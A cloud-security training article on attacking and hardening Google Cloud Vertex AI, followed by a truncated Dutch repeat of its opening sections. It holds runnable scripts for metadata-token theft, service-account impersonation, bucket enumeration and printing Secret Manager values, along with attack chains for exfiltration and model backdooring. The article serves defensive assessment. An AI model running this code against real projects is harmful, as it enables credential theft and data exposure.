GCP Vertex AI Attack Surface

Advanced | 14 min read | Updated 2026-03-13

Security assessment of Google Cloud Vertex AI -- service account exploitation, endpoint security, notebook attacks, and pipeline manipulation.

gcp vertex-ai cloud ml-platform

Vertex AI Architecture

GCP Vertex AI provides managed ML services that are integrated with Google Cloud's IAM, networking, and storage systems. Resources are organized per GCP project and use service accounts for authentication.

Key Components

Component	Identity	Storage	Network
Workbench	Service account	GCS	VPC optional
Training jobs	Custom service account	GCS input/output	VPC optional
Endpoints	Service account	Model in GCS/Artifact Registry	Internet-facing
Pipelines	Pipeline SA	GCS artifacts	VPC
Feature Store	Feature Store SA	Bigtable/BigQuery	VPC

Attack Techniques

1. Service Account Token Extraction

Vertex AI Workbench instances (formerly AI Platform Notebooks) run with a GCP service account attached. The GCP metadata server at metadata.google.internal issues access tokens without any additional authentication, so any code running on the instance can obtain tokens for the attached service account.

Unlike AWS IMDSv2, which requires a session token obtained through a separate PUT request, the GCP metadata server requires only a Metadata-Flavor: Google header, which is trivial to add. The primary risk is that Workbench service accounts are often granted the Editor role on the project, giving them write access to almost every GCP resource.

import requests
 
# From inside a Vertex AI Workbench instance
# GCP metadata server for service account tokens
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
# Get the service account
sa = requests.get(
    f"{metadata_url}/instance/service-accounts/default/email",
    headers=headers
).text
print(f"Service Account: {sa}")
 
# Get an access token
token = requests.get(
    f"{metadata_url}/instance/service-accounts/default/token",
    headers=headers
).json()["access_token"]
 
# Enumerate accessible projects
projects = requests.get(
    "https://cloudresourcemanager.googleapis.com/v1/projects",
    headers={"Authorization": f"Bearer {token}"}
).json()
for p in projects.get("projects", []):
    print(f"Project: {p['name']} ({p['projectId']})")
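
The Editor-role risk described above can be checked offline once a project IAM policy has been retrieved. The following is a minimal sketch, assuming the policy is available as a dict in the shape returned by the Resource Manager getIamPolicy call; the helper name `find_broad_service_accounts` and the sample policy are hypothetical and exist only for illustration.

```python
from typing import Dict, List

# Basic roles that grant near-total access to a project.
BROAD_ROLES = {"roles/editor", "roles/owner"}


def find_broad_service_accounts(policy: Dict) -> List[Dict[str, str]]:
    """Return service account members bound to Editor or Owner.

    `policy` is assumed to look like:
    {"bindings": [{"role": "...", "members": ["serviceAccount:..."]}]}
    """
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        if role not in BROAD_ROLES:
            continue
        for member in binding.get("members", []):
            # Only service accounts are of interest here, not users or groups.
            if member.startswith("serviceAccount:"):
                findings.append({
                    "member": member.split(":", 1)[1],
                    "role": role,
                })
    return findings


# Hypothetical policy used only to illustrate the check.
sample_policy = {
    "bindings": [
        {"role": "roles/editor",
         "members": ["serviceAccount:123-compute@developer.gserviceaccount.com",
                     "user:alice@example.com"]},
        {"role": "roles/aiplatform.user",
         "members": ["serviceAccount:wb@example-project.iam.gserviceaccount.com"]},
    ]
}

for finding in find_broad_service_accounts(sample_policy):
    print(f"[!] {finding['member']} holds {finding['role']}")
```

The sketch only inspects project-level bindings; roles inherited from a folder or organization would need the same check against those policies.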

Full Metadata Enumeration

import requests
 
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
def get_metadata(path):
    """Fetch a metadata subtree as JSON (recursive=true returns all children)."""
    resp = requests.get(
        f"{metadata_url}/{path}",
        headers={**headers, "Accept": "application/json"},
        params={"recursive": "true"},
        timeout=5,
    )
    # Fail loudly: the callers below expect a dict and call .get() on the result
    resp.raise_for_status()
    return resp.json()
 
# Instance metadata
instance = get_metadata("instance")
print(f"Instance name: {instance.get('name')}")
print(f"Zone: {instance.get('zone')}")
print(f"Machine type: {instance.get('machineType')}")
 
# Network interfaces (discover VPC, subnet, external IP)
for iface in instance.get('networkInterfaces', []):
    print(f"Network: {iface.get('network')}")
    print(f"  Internal IP: {iface.get('ip')}")
    for ac in iface.get('accessConfigs', []):
        print(f"  External IP: {ac.get('externalIp')}")
 
# All service accounts and their scopes
for sa_email in instance.get('serviceAccounts', {}):
    sa_info = instance['serviceAccounts'][sa_email]
    print(f"\nService Account: {sa_email}")
    print(f"  Scopes: {sa_info.get('scopes', [])}")
 
# Project-level metadata (may contain secrets set by admins)
project = get_metadata("project")
for key, value in project.get('attributes', {}).items():
    print(f"Project attribute: {key} = {str(value)[:100]}")
    if any(kw in key.lower() for kw in
           ['key', 'secret', 'password', 'token', 'credential']):
        print(f"  [!] Potentially sensitive project attribute")
 
# Check for custom instance attributes
for key, value in instance.get('attributes', {}).items():
    print(f"Instance attribute: {key} = {str(value)[:100]}")

Service Account Privilege Escalation

GCP service accounts can impersonate other service accounts if they hold the iam.serviceAccountTokenCreator role on them. This creates privilege escalation chains that are not visible from the Workbench instance itself.

import requests
import json
 
def check_sa_impersonation(token, project_id, source_sa):
    """Check if the current service account can impersonate others."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all service accounts in the project
    sa_url = (
        f"https://iam.googleapis.com/v1/projects/{project_id}"
        f"/serviceAccounts"
    )
    sas = requests.get(sa_url, headers=headers).json()
 
    for sa in sas.get('accounts', []):
        sa_email = sa['email']
        if sa_email == source_sa:
            continue
 
        # Attempt to generate an access token for this SA
        impersonate_url = (
            f"https://iamcredentials.googleapis.com/v1/projects/-"
            f"/serviceAccounts/{sa_email}:generateAccessToken"
        )
        resp = requests.post(
            impersonate_url,
            headers={
                "Authorization": f"Bearer {token}",
                "Content-Type": "application/json"
            },
            json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
        )
 
        if resp.status_code == 200:
            print(f"[!] Can impersonate: {sa_email}")
            impersonated_token = resp.json()['accessToken']
            # Test what this SA can access
            test_permissions(impersonated_token, project_id)
        else:
            print(f"Cannot impersonate: {sa_email}")
 
def test_permissions(token, project_id):
    """Quick permission check for an access token."""
    headers = {"Authorization": f"Bearer {token}"}
    tests = {
        "BigQuery": f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets",
        "GCS": "https://storage.googleapis.com/storage/v1/b?project=" + project_id,
        "Compute": f"https://compute.googleapis.com/compute/v1/projects/{project_id}/zones",
        "SecretManager": f"https://secretmanager.googleapis.com/v1/projects/{project_id}/secrets",
    }
    for service, url in tests.items():
        resp = requests.get(url, headers=headers)
        status = "accessible" if resp.status_code == 200 else "denied"
        print(f"  {service}: {status}")
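
Because impersonation is transitive, the chains mentioned above can be modeled as a directed graph and searched. The following is a minimal sketch, assuming the "can impersonate" edges have already been collected (for example from successful generateAccessToken calls); the function name `find_impersonation_paths` and the account names are hypothetical.

```python
from collections import deque
from typing import Dict, List, Set


def find_impersonation_paths(edges: Dict[str, Set[str]],
                             start: str) -> Dict[str, List[str]]:
    """Breadth-first search over 'can impersonate' edges.

    `edges` maps a service account to the set of accounts it can mint
    tokens for. Returns the shortest chain from `start` to every
    reachable account.
    """
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        current = queue.popleft()
        for target in sorted(edges.get(current, set())):
            if target not in paths:  # visited check also handles cycles
                paths[target] = paths[current] + [target]
                queue.append(target)
    del paths[start]  # the starting account itself is not an escalation
    return paths


# Hypothetical edges used only for illustration.
edges = {
    "workbench-sa": {"pipeline-sa"},
    "pipeline-sa": {"deploy-sa"},
    "deploy-sa": {"workbench-sa"},
}

for target, chain in find_impersonation_paths(edges, "workbench-sa").items():
    print(f"{target}: {' -> '.join(chain)}")
```

Breadth-first search is used so that each reported chain is the shortest one, which is usually the easiest to explain in a finding.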

2. Vertex AI Endpoint Enumeration

Vertex AI endpoints serve model predictions. By default, endpoints require IAM authentication, but misconfigurations such as allUsers or allAuthenticatedUsers bindings on the endpoint resource can expose models publicly.

from google.cloud import aiplatform
 
aiplatform.init(project="my-project", location="us-central1")
 
# List all endpoints
endpoints = aiplatform.Endpoint.list()
for endpoint in endpoints:
    print(f"Endpoint: {endpoint.display_name}")
    print(f"  Resource: {endpoint.resource_name}")
    print(f"  Models: {[m.display_name for m in endpoint.list_models()]}")
 
    # Test prediction
    try:
        result = endpoint.predict(instances=[{"text": "test"}])
        print(f"  Prediction: {result.predictions[:1]}")
    except Exception as e:
        print(f"  Error: {e}")

Endpoint IAM Policy Analysis

import requests
 
def analyze_endpoint_iam(token, project_id, location, endpoint_id):
    """Check IAM policy on a Vertex AI endpoint for overly permissive access."""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
 
    resource = (
        f"projects/{project_id}/locations/{location}"
        f"/endpoints/{endpoint_id}"
    )
    url = (
        f"https://{location}-aiplatform.googleapis.com/v1/{resource}"
        f":getIamPolicy"
    )
    resp = requests.post(url, headers=headers, json={})
    policy = resp.json()
 
    findings = []
    for binding in policy.get('bindings', []):
        role = binding['role']
        members = binding['members']
 
        # Check for overly permissive access
        for member in members:
            if member in ('allUsers', 'allAuthenticatedUsers'):
                findings.append({
                    "severity": "CRITICAL",
                    "finding": f"Endpoint publicly accessible: "
                               f"{member} has {role}"
                })
            elif member.startswith('domain:'):
                findings.append({
                    "severity": "MEDIUM",
                    "finding": f"Domain-wide access: {member} has {role}"
                })
 
    return findings
 
# Also check for endpoints exposed via API Gateway or Cloud Endpoints
def check_api_gateway_exposure(token, project_id):
    """Check if Vertex AI endpoints are exposed via API Gateway."""
    headers = {"Authorization": f"Bearer {token}"}
    url = (
        f"https://apigateway.googleapis.com/v1/projects/{project_id}"
        f"/locations/-/apis"
    )
    resp = requests.get(url, headers=headers)
    for api in resp.json().get('apis', []):
        print(f"API Gateway: {api['displayName']} - {api['name']}")

3. Access to GCS Training Data

Vertex AI stores training data, model artifacts, pipeline output, and TensorBoard logs in Google Cloud Storage. GCS bucket naming is less predictable than SageMaker's convention, but bucket labels and IAM policies reveal ML-related buckets.

from google.cloud import storage
 
client = storage.Client()
 
# List buckets looking for ML data
for bucket in client.list_buckets():
    if any(kw in bucket.name.lower() for kw in ['ml', 'training', 'data', 'model', 'vertex']):
        print(f"\nBucket: {bucket.name}")
        blobs = list(bucket.list_blobs(max_results=10))
        for blob in blobs:
            print(f"  {blob.name} ({blob.size} bytes)")
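
Plain substring matching on short keywords such as "ml" also matches unrelated names like "html". The following is a minimal sketch of a token-based alternative that also considers bucket labels; the keyword set and the helper name `looks_like_ml_bucket` are assumptions chosen for illustration, not a fixed convention.

```python
import re
from typing import Dict, Optional

# Hypothetical keyword set; adapt to the naming habits of the target project.
ML_TOKENS = {"ml", "training", "model", "models", "vertex", "tensorboard"}


def looks_like_ml_bucket(name: str,
                         labels: Optional[Dict[str, str]] = None) -> bool:
    """Match ML keywords against whole name tokens and label keys/values."""
    # Bucket names are split on the separators GCS allows: dash, underscore, dot.
    tokens = set(re.split(r"[-_.]", name.lower()))
    for key, value in (labels or {}).items():
        tokens.update(re.split(r"[-_.]", key.lower()))
        tokens.update(re.split(r"[-_.]", value.lower()))
    return bool(tokens & ML_TOKENS)


print(looks_like_ml_bucket("acme-ml-training"))
print(looks_like_ml_bucket("static-html-assets"))
print(looks_like_ml_bucket("bkt-01", {"team": "vertex"}))
```

Token matching trades recall for precision: a bucket named "mldata" would be missed, so the two approaches can be combined when coverage matters more than noise.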

Deep GCS Enumeration and Sensitive Data Discovery

from google.cloud import storage
import json
 
client = storage.Client()
 
def enumerate_ml_buckets(client):
    """Comprehensive ML bucket discovery and content analysis."""
    ml_keywords = ['ml', 'training', 'data', 'model', 'vertex', 'pipeline',
                   'experiment', 'tensorboard', 'artifact', 'feature']
    sensitive_extensions = ['.csv', '.parquet', '.jsonl', '.pkl', '.pickle',
                           '.pt', '.pth', '.h5', '.pb', '.onnx']
 
    for bucket in client.list_buckets():
        # Check bucket name and labels
        is_ml = any(kw in bucket.name.lower() for kw in ml_keywords)
        labels = bucket.labels or {}
        is_ml = is_ml or any(kw in str(labels).lower() for kw in ml_keywords)
 
        if not is_ml:
            continue
 
        print(f"\n{'='*60}")
        print(f"Bucket: {bucket.name}")
        print(f"  Location: {bucket.location}")
        print(f"  Storage class: {bucket.storage_class}")
        print(f"  Labels: {labels}")
        print(f"  Versioning: {bucket.versioning_enabled}")
        print(f"  Public access prevention: {bucket.iam_configuration.public_access_prevention}")
 
        # Check bucket IAM policy
        try:
            policy = bucket.get_iam_policy()
            for role, members in policy.items():
                for member in members:
                    if member in ('allUsers', 'allAuthenticatedUsers'):
                        print(f"  [CRITICAL] Public access: {member} -> {role}")
        except Exception as e:
            print(f"  Cannot read IAM: {e}")
 
        # Enumerate contents looking for sensitive data
        sensitive_files = []
        total_size = 0
        for blob in bucket.list_blobs(max_results=100):
            total_size += blob.size
            if any(blob.name.endswith(ext) for ext in sensitive_extensions):
                sensitive_files.append({
                    "name": blob.name,
                    "size": blob.size,
                    "updated": str(blob.updated)
                })
 
        print(f"  Total size (sampled): {total_size / 1e6:.1f} MB")
        if sensitive_files:
            print(f"  Sensitive files found: {len(sensitive_files)}")
            for f in sensitive_files[:10]:
                print(f"    {f['name']} ({f['size']} bytes)")
 
# Also check BigQuery datasets (common for feature stores)
def check_bigquery_datasets(token, project_id):
    """Enumerate BigQuery datasets that may contain ML features or training data."""
    import requests
    headers = {"Authorization": f"Bearer {token}"}
    url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets"
    resp = requests.get(url, headers=headers)
    for ds in resp.json().get('datasets', []):
        ds_ref = ds['datasetReference']
        print(f"BigQuery dataset: {ds_ref['datasetId']}")
        # Check for ML-related tables
        tables_url = (
            f"https://bigquery.googleapis.com/bigquery/v2/projects/"
            f"{project_id}/datasets/{ds_ref['datasetId']}/tables"
        )
        tables = requests.get(tables_url, headers=headers).json()
        for table in tables.get('tables', []):
            print(f"  Table: {table['tableReference']['tableId']}")

4. Pipeline Artifact Extraction

Vertex AI Pipelines (based on Kubeflow Pipelines) orchestrate ML workflows. Pipeline runs contain artifacts, including trained models, evaluation metrics, dataset references, and hyperparameters. Compromising pipeline access reveals the full ML workflow and its data dependencies.

from google.cloud import aiplatform
 
# List pipeline runs and their artifacts
for run in aiplatform.PipelineJob.list():
    print(f"Pipeline: {run.display_name}")
    print(f"  State: {run.state}")
    print(f"  Created: {run.create_time}")
    # Pipeline artifacts contain model files, metrics, and parameters
    for detail in run.task_details:
        print(f"  Task: {detail.task_name}")
        for artifact in detail.outputs.values():
            print(f"    Output: {artifact}")

Pipeline Template and Configuration Extraction

from google.cloud import aiplatform
import json
 
def extract_pipeline_details(project_id, location):
    """Extract pipeline templates and configurations that reveal
    the full ML workflow."""
    aiplatform.init(project=project_id, location=location)
 
    for run in aiplatform.PipelineJob.list():
        print(f"\n{'='*60}")
        print(f"Pipeline: {run.display_name}")
        print(f"  State: {run.state}")
        print(f"  Service Account: {run.service_account}")
        print(f"  Network: {run.network}")
 
        # Extract pipeline spec (the workflow definition)
        if hasattr(run, 'pipeline_spec'):
            spec = run.pipeline_spec
            # Pipeline specs reveal component images, input/output locations,
            # and the full data flow
            if 'components' in spec:
                for comp_name, comp in spec['components'].items():
                    print(f"  Component: {comp_name}")
                    if 'executorLabel' in comp:
                        print(f"    Executor: {comp['executorLabel']}")
 
        # Extract runtime parameters (may contain sensitive values)
        if hasattr(run, 'runtime_config'):
            config = run.runtime_config
            if 'parameters' in config:
                for param_name, param_value in config['parameters'].items():
                    value_str = str(param_value)[:100]
                    print(f"  Param: {param_name} = {value_str}")
                    if any(kw in param_name.lower() for kw in
                           ['key', 'secret', 'token', 'password']):
                        print(f"    [!] Potentially sensitive parameter")
 
    # Also check Vertex AI Metadata Store for experiment tracking
    print("\n=== Metadata Store (Experiments) ===")
    for experiment in aiplatform.Experiment.list():
        print(f"Experiment: {experiment.name}")
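
Pipeline specs and runtime parameters tend to embed storage locations, which is how a pipeline reveals its data dependencies. The following is a minimal sketch that walks an already-retrieved spec (a nested dict) and collects every gs:// URI it finds; the function name `collect_gcs_uris` and the sample spec are hypothetical, and the sample does not claim to reproduce the exact pipeline spec schema.

```python
import re
from typing import Any, Set

# Bucket name followed by an optional object path without whitespace.
GCS_URI = re.compile(r"gs://[a-z0-9][a-z0-9._-]*(?:/\S*)?")


def collect_gcs_uris(node: Any) -> Set[str]:
    """Recursively walk dicts, lists, and strings and collect gs:// URIs."""
    found: Set[str] = set()
    if isinstance(node, dict):
        for value in node.values():
            found |= collect_gcs_uris(value)
    elif isinstance(node, (list, tuple)):
        for item in node:
            found |= collect_gcs_uris(item)
    elif isinstance(node, str):
        found.update(GCS_URI.findall(node))
    return found


# Hypothetical spec fragment used only for illustration.
sample_spec = {
    "root": {"inputDefinitions": {"parameters": {
        "train_data": {"defaultValue": "gs://example-ml-data/train.csv"}}}},
    "deploymentSpec": {"executors": {"exec-train": {"container": {
        "args": ["--out", "gs://example-ml-models/run-1/"]}}}},
}

for uri in sorted(collect_gcs_uris(sample_spec)):
    print(uri)
```

The same walk works on runtime parameters, so one helper covers both the template and the per-run configuration.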

5. Secret Manager Exploitation

GCP Secret Manager is the recommended way to store credentials, but Vertex AI service accounts may have overly broad access to secrets beyond what ML workflows require.

import requests
 
def enumerate_secrets(token, project_id):
    """Enumerate and attempt to access Secret Manager secrets."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all secrets
    url = (
        f"https://secretmanager.googleapis.com/v1/projects/{project_id}"
        f"/secrets"
    )
    resp = requests.get(url, headers=headers)
    secrets = resp.json().get('secrets', [])
 
    for secret in secrets:
        secret_name = secret['name'].split('/')[-1]
        print(f"\nSecret: {secret_name}")
        print(f"  Created: {secret.get('createTime')}")
        labels = secret.get('labels', {})
        print(f"  Labels: {labels}")
 
        # Attempt to access the latest version
        version_url = (
            f"https://secretmanager.googleapis.com/v1/"
            f"{secret['name']}/versions/latest:access"
        )
        version_resp = requests.get(version_url, headers=headers)
        if version_resp.status_code == 200:
            import base64
            payload = version_resp.json()['payload']['data']
            decoded = base64.b64decode(payload).decode('utf-8', errors='replace')
            print(f"  [!] Accessible - Value: {decoded[:50]}...")
        else:
            print(f"  Access denied ({version_resp.status_code})")

Defensive Assessment Checklist

Control area	What to verify	MITRE ATLAS reference
Service accounts	Least-privilege roles, no `Editor` or `Owner` on Workbench SAs	AML.T0003 (ML Model Access)
Metadata server	Custom metadata attributes contain no secrets	AML.TA0008 (Collection)
Network	VPC Service Controls, Private Google Access, no public IPs on Workbench	AML.T0002 (Active Scanning)
GCS	Uniform bucket-level access, no `allUsers` bindings, encryption	AML.T0000 (Search for Data)
Endpoints	IAM authentication only, no public access bindings	AML.T0003 (ML Model Access)
Secrets	Scoped Secret Manager access, audit logging	AML.TA0008 (Collection)
Pipelines	Pipeline SA separate from Workbench SA, no secrets in parameters	AML.T0018 (Backdoor ML Model)
Logging	Cloud Audit Logs enabled, Data Access logs for GCS and BigQuery	AML.TA0006 (Defense Evasion)

Recommended Hardening

Use dedicated service accounts per Workbench instance with only the IAM roles needed for that user's work, never Editor or Owner.
Enable VPC Service Controls to create a security perimeter around ML resources, which blocks data exfiltration to destinations outside the perimeter even when the credentials are valid.
Use Workload Identity Federation instead of service account keys where possible.
Enable Cloud Audit Logs with Data Access logging for GCS, BigQuery, and Vertex AI API calls.
Remove public IPs from Workbench instances and use IAP (Identity-Aware Proxy) tunnels for access.
Enforce organization policies such as constraints/iam.disableServiceAccountKeyCreation and constraints/compute.requireShieldedVm.
Use Customer-Managed Encryption Keys (CMEK) for GCS buckets, BigQuery datasets, and Vertex AI resources.
Implement VPC-SC ingress/egress rules to restrict which identities and services can access the ML perimeter.
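
The audit logging recommendation can be verified from the `auditConfigs` section of a project IAM policy. The following is a minimal sketch, assuming the policy has already been fetched as a dict; the function name `missing_data_access_logs`, the list of services passed in, and the sample policy are assumptions for illustration, and the sketch ignores `exemptedMembers`.

```python
from typing import Dict, Iterable, List, Set

REQUIRED_LOG_TYPES = {"DATA_READ", "DATA_WRITE"}


def missing_data_access_logs(policy: Dict,
                             services: Iterable[str]) -> Dict[str, List[str]]:
    """Return, per service, the Data Access log types that are not enabled."""
    enabled: Dict[str, Set[str]] = {}
    for config in policy.get("auditConfigs", []):
        types = {c.get("logType") for c in config.get("auditLogConfigs", [])}
        enabled.setdefault(config.get("service", ""), set()).update(types)

    # An "allServices" entry applies to every service in the project.
    everywhere = enabled.get("allServices", set())
    gaps = {}
    for service in services:
        missing = REQUIRED_LOG_TYPES - everywhere - enabled.get(service, set())
        if missing:
            gaps[service] = sorted(missing)
    return gaps


# Hypothetical policy fragment used only for illustration.
sample_policy = {
    "auditConfigs": [
        {"service": "storage.googleapis.com",
         "auditLogConfigs": [{"logType": "DATA_READ"},
                             {"logType": "DATA_WRITE"}]},
        {"service": "aiplatform.googleapis.com",
         "auditLogConfigs": [{"logType": "DATA_WRITE"}]},
    ]
}

services_to_check = ("storage.googleapis.com", "aiplatform.googleapis.com")
print(missing_data_access_logs(sample_policy, services_to_check))
```

Passing the service list as a parameter keeps the check reusable for whichever APIs the ML workload actually touches.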

Common Attack Chains

Chain 1: From Workbench to Project Takeover

1. Initial access via compromised user credentials or malicious notebook
2. Extract service account token from GCP metadata server
3. Discover the SA has Editor role on the project (common misconfiguration)
4. Enumerate all project resources: GCS, BigQuery, Compute Engine, GKE
5. Access Secret Manager to extract API keys and database credentials
6. Test service account impersonation for SAs in other projects
7. If impersonation succeeds, pivot to other projects in the organization

Chain 2: Pipeline-Based Data Exfiltration

1. Access Vertex AI Pipelines via compromised service account
2. Extract pipeline templates to understand data flow
3. Identify GCS buckets and BigQuery tables used for training data
4. Access training datasets containing PII or proprietary data
5. Exfiltrate data to attacker-controlled GCS bucket (if VPC-SC absent)
6. Use extracted data for model replication or competitive intelligence

Chain 3: Model Artifact Manipulation

1. Enumerate GCS buckets containing model artifacts
2. Download the production model artifact
3. Inject a backdoor (e.g., trojan trigger in the model weights)
4. Upload modified artifact to the same GCS path
5. If model versioning is not enforced, the next deployment loads the
   backdoored model
6. Backdoor activates on specific trigger inputs in production
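
Steps 4 and 5 of this chain succeed only when nothing checks the artifact before it is loaded. The following is a minimal sketch of one possible countermeasure: record a SHA-256 digest when the model is produced and verify it before deployment. The helper names are hypothetical, and the sketch assumes the recorded digest is stored somewhere the attacker cannot overwrite (not in the same bucket as the artifact).

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file in chunks so large model artifacts fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: Path, expected_sha256: str) -> bool:
    """Compare the current digest with the one recorded at training time."""
    return hmac.compare_digest(sha256_of_file(path), expected_sha256.lower())


# Illustration with a temporary file standing in for a downloaded artifact.
with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "model.bin"
    artifact.write_bytes(b"original weights")
    recorded = sha256_of_file(artifact)           # stored at training time
    print(verify_artifact(artifact, recorded))    # unchanged artifact

    artifact.write_bytes(b"backdoored weights")   # simulated tampering
    print(verify_artifact(artifact, recorded))    # digest no longer matches
```

A digest check detects replacement of the file but says nothing about a model that was backdoored before the digest was recorded, so it complements bucket IAM and object versioning rather than replacing them.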

GCP-Specific Risks

GCP presents several unique risks compared with AWS and Azure in the context of ML security:

GCP-specific risk	Description	Mitigation
Default Compute Engine SA	Vertex AI may use the default Compute Engine service account, which is often granted `Editor` on the project	Create dedicated SAs with minimal roles
Organization policy gaps	Organization policies may not cover Vertex AI-specific resources	Extend organization policies to cover `aiplatform.*` constraints
VPC-SC complexity	VPC Service Controls are powerful but complex; misconfigured perimeters create a false sense of security	Audit the VPC-SC configuration regularly
BigQuery integration	Vertex AI Feature Store uses BigQuery, which may hold sensitive non-ML data	Separate BigQuery datasets for ML features
Shared Artifact Registry repos	ML container images may share repos with non-ML containers	Dedicated repos for ML images with strict IAM

MITRE ATLAS Mapping for Vertex AI Attacks

Attack technique	ATLAS ID	Vertex AI-specific context
Token extraction via metadata server	AML.TA0002 (Initial Access)	Workbench service account with broad project access
GCS data enumeration	AML.T0000 (Search for Victim's Data)	ML buckets are discoverable through labels and naming
Endpoint probing	AML.T0002 (Active Scanning)	Vertex AI endpoints may have public IAM bindings
Model extraction via prediction API	AML.T0024 (Model Extraction)	High-query-volume attacks through Vertex AI Prediction
Pipeline artifact manipulation	AML.T0018 (Backdoor ML Model)	GCS model artifacts are modifiable if bucket IAM is weak
Feature Store poisoning	AML.T0020 (Data Poisoning)	Modification of BigQuery/Bigtable feature data

Related Topics

Cloud AI Infrastructure -- Cross-platform overview
AWS SageMaker -- AWS comparison
Azure ML -- Azure comparison

Knowledge Check

What is the primary lateral movement path from a compromised Vertex AI Workbench instance?

GCP Vertex AI-aanvalsoppervlak

Gevorderd14 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van Google Cloud Vertex AI -- exploitatie van serviceaccounts, endpointbeveiliging, notebook-aanvallen en pijplijnmanipulatie.

gcp vertex-ai cloud ml-platform

Vertex AI-architectuur

Belangrijkste componenten

Component	Identiteit	Opslag	Netwerk
Workbench	Serviceaccount	GCS	VPC optioneel
Trainingstaken	Aangepast serviceaccount	GCS in-/uitvoer	VPC optioneel
Endpoints	Serviceaccount	Model in GCS/AR	Internetgericht
Pipelines	Pipeline-SA	GCS-artefacten	VPC
Feature Store	Featurestore-SA	BigTable/BigQuery	VPC

Aanvalstechnieken

1. Extractie van serviceaccounttoken

import requests
 
# From inside a Vertex AI Workbench instance
# GCP metadata server for service account tokens
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
# Get the service account
sa = requests.get(
    f"{metadata_url}/instance/service-accounts/default/email",
    headers=headers
).text
print(f"Service Account: {sa}")
 
# Get an access token
token = requests.get(
    f"{metadata_url}/instance/service-accounts/default/token",
    headers=headers
).json()["access_token"]
 
# Enumerate accessible projects
projects = requests.get(
    "https://cloudresourcemanager.googleapis.com/v1/projects",
    headers={"Authorization": f"Bearer {token}"}
).json()
for p in projects.get("projects", []):
    print(f"Project: {p['name']} ({p['projectId']})")

Volledige metadata-enumeratie

import requests
 
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
def get_metadata(path):
    """Recursively enumerate metadata entries."""
    resp = requests.get(
        f"{metadata_url}/{path}",
        headers={**headers, "Accept": "application/json"},
        params={"recursive": "true"}
    )
    return resp.json() if resp.status_code == 200 else resp.text
 
# Instance metadata
instance = get_metadata("instance")
print(f"Instance name: {instance.get('name')}")
print(f"Zone: {instance.get('zone')}")
print(f"Machine type: {instance.get('machineType')}")
 
# Network interfaces (discover VPC, subnet, external IP)
for iface in instance.get('networkInterfaces', []):
    print(f"Network: {iface.get('network')}")
    print(f"  Internal IP: {iface.get('ip')}")
    for ac in iface.get('accessConfigs', []):
        print(f"  External IP: {ac.get('externalIp')}")
 
# All service accounts and their scopes
for sa_email in instance.get('serviceAccounts', {}):
    sa_info = instance['serviceAccounts'][sa_email]
    print(f"\nService Account: {sa_email}")
    print(f"  Scopes: {sa_info.get('scopes', [])}")
 
# Project-level metadata (may contain secrets set by admins)
project = get_metadata("project")
for key, value in project.get('attributes', {}).items():
    print(f"Project attribute: {key} = {str(value)[:100]}")
    if any(kw in key.lower() for kw in
           ['key', 'secret', 'password', 'token', 'credential']):
        print(f"  [!] Potentially sensitive project attribute")
 
# Check for custom instance attributes
for key, value in instance.get('attributes', {}).items():
    print(f"Instance attribute: {key} = {str(value)[:100]}")

Privilege-escalatie van serviceaccounts

import requests
import json
 
def check_sa_impersonation(token, project_id, source_sa):
    """Check if the current service account can impersonate others."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all service accounts in the project
    sa_url = (
        f"https://iam.googleapis.com/v1/projects/{project_id}"
        f"/serviceAccounts"
    )
    sas = requests.get(sa_url, headers=headers).json()
 
    for sa in sas.get('accounts', []):
        sa_email = sa['email']
        if sa_email == source_sa:
            continue
 
        # Attempt to generate an access token for this SA
        impersonate_url = (
            f"https://iamcredentials.googleapis.com/v1/projects/-"
            f"/serviceAccounts/{sa_email}:generateAccessToken"
        )
        resp = requests.post(
            impersonate_url,
            headers={
                "Authorization": f"Bearer {token}",
                "Content-Type": "application/json"
            },
            json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
        )
 
        if resp.status_code == 200:
            print(f"[!] Can impersonate: {sa_email}")
            impersonated_token = resp.json()['accessToken']
            # Test what this SA can access
            test_permissions(impersonated_token, project_id)
        else:
            print(f"Cannot impersonate: {sa_email}")
 
def test_permissions(token, project_id):
    """Quick permission check for an access token."""
    headers = {"Authorization": f"Bearer {token}"}
    tests = {
        "BigQuery": f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets",
        "GCS": "https://storage.googleapis.com/storage/v1/b?project=" + project_id,
        "Compute": f"https://compute.googleapis.com/compute/v1/projects/{project_id}/zones",
        "SecretManager": f"https://secretmanager.googleapis.com/v1/projects/{project_id}/secrets",
    }
    for service, url in tests.items():
        resp = requests.get(url, headers=headers)
        status = "accessible" if resp.status_code == 200 else "denied"
        print(f"  {service}: {status}")

2. Enumeratie van Vertex AI-endpoints

from google.cloud import aiplatform
 
aiplatform.init(project="my-project", location="us-central1")
 
# List all endpoints
endpoints = aiplatform.Endpoint.list()
for endpoint in endpoints:
    print(f"Endpoint: {endpoint.display_name}")
    print(f"  Resource: {endpoint.resource_name}")
    print(f"  Models: {[m.display_name for m in endpoint.list_models()]}")
 
    # Test prediction
    try:
        result = endpoint.predict(instances=[{"text": "test"}])
        print(f"  Prediction: {result.predictions[:1]}")
    except Exception as e:
        print(f"  Error: {e}")

Analyse van het IAM-beleid van endpoints

import requests
 
def analyze_endpoint_iam(token, project_id, location, endpoint_id):
    """Check IAM policy on a Vertex AI endpoint for overly permissive access."""
    headers = {
